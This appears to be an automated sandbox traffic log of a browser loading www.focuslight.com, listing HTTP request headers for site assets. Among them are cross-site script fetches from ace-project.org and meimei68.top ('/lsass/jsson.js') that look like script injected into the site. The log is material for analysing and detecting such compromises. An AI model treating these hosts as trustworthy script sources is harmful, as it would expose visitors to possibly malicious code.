    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/layer/layer.js HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/grzxicn0.png HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/grzxicnred0.png HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/layer/theme/default/layer.css?v=3.1.1 HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: text/css,*/*;q=0.1
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: style
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=0
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/gwcicn0.png HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/gwcicnred0.png HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/Heptagon-Logo-white.png HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=2, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/sousuo0.png HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jtlered0.png HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/xiangxia.png HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jtrired1.png HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/Manrope-Regular.woff2 HTTP/1.1
    host: www.focuslight.com
    origin: https://www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: cors
    sec-fetch-dest: font
    referer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=0
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/Manrope-Bold.woff2 HTTP/1.1
    host: www.focuslight.com
    origin: https://www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: cors
    sec-fetch-dest: font
    referer: https://www.focuslight.com/wp-content/themes/cn/en_css/public.css?v=1
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=0
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/js/countUp.min.js HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: */*
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: script
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/logo.svg HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/09/02%E5%8D%8A%E5%AF%BC%E4%BD%93%E6%BF%80%E5%85%89%E5%85%83%E5%99%A8%E4%BB%B6.jpg HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/08/03%E6%BF%80%E5%85%89%E5%85%89%E5%AD%A6%E5%85%83%E5%99%A8%E4%BB%B6.jpg HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2023/08/01%E5%8E%9F%E6%9D%90%E6%96%99.jpg HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2024/07/04%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88.jpg HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2022/09/Optical-coating-3.jpg HTTP/1.1
    host: www.focuslight.com
    sec-ch-ua-platform: "Windows"
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    sec-fetch-site: same-origin
    sec-fetch-mode: no-cors
    sec-fetch-dest: image
    referer: https://www.focuslight.com/
    accept-encoding: gzip, deflate, br, zstd
    accept-language: en-US,en;q=0.9
    priority: u=1, i
Source: global traffic HTTP traffic detected: GET /d.js HTTP/1.1
    Host: ace-project.org
    Connection: keep-alive
    sec-ch-ua-platform: "Windows"
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
    sec-ch-ua-mobile: ?0
    Accept: */*
    Sec-Fetch-Site: cross-site
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: script
    Sec-Fetch-Storage-Access: active
    Referer: https://www.focuslight.com/
    Accept-Encoding: gzip, deflate, br, zstd
    Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/grzxicn0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/grzxicnred0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3AbPdawTdpo235d&MD=4WrkVZ6r HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Source: global traffic HTTP traffic detected: GET /lsass/jsson.js HTTP/1.1Host: meimei68.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/Heptagon-Logo.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/Heptagon-Logo-white.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/gwcicnred0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/gwcicn0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/sousuo0.png HTTP/1.1host: www.focuslight.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/01/2025-2-28-%E6%B6%88%E8%B4%B9%E7%94%B5%E5%AD%90-EN-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/05/LWOP-EN-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/03/V-groove-EN-1-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2025/03/Global-Optimization-EN-1-scaled.jpg HTTP/1.1Host: focuslight-www.oss-ap-southeast-1.aliyuncs.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.focuslight.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/logo1.svg HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jticn0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jticn1.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/whicn0.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/whicn1.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/whicn2.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/spvideicn.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /wp-content/themes/cn/images/jiantouup.png HTTP/1.1host: www.focuslight.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.focuslight.com/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
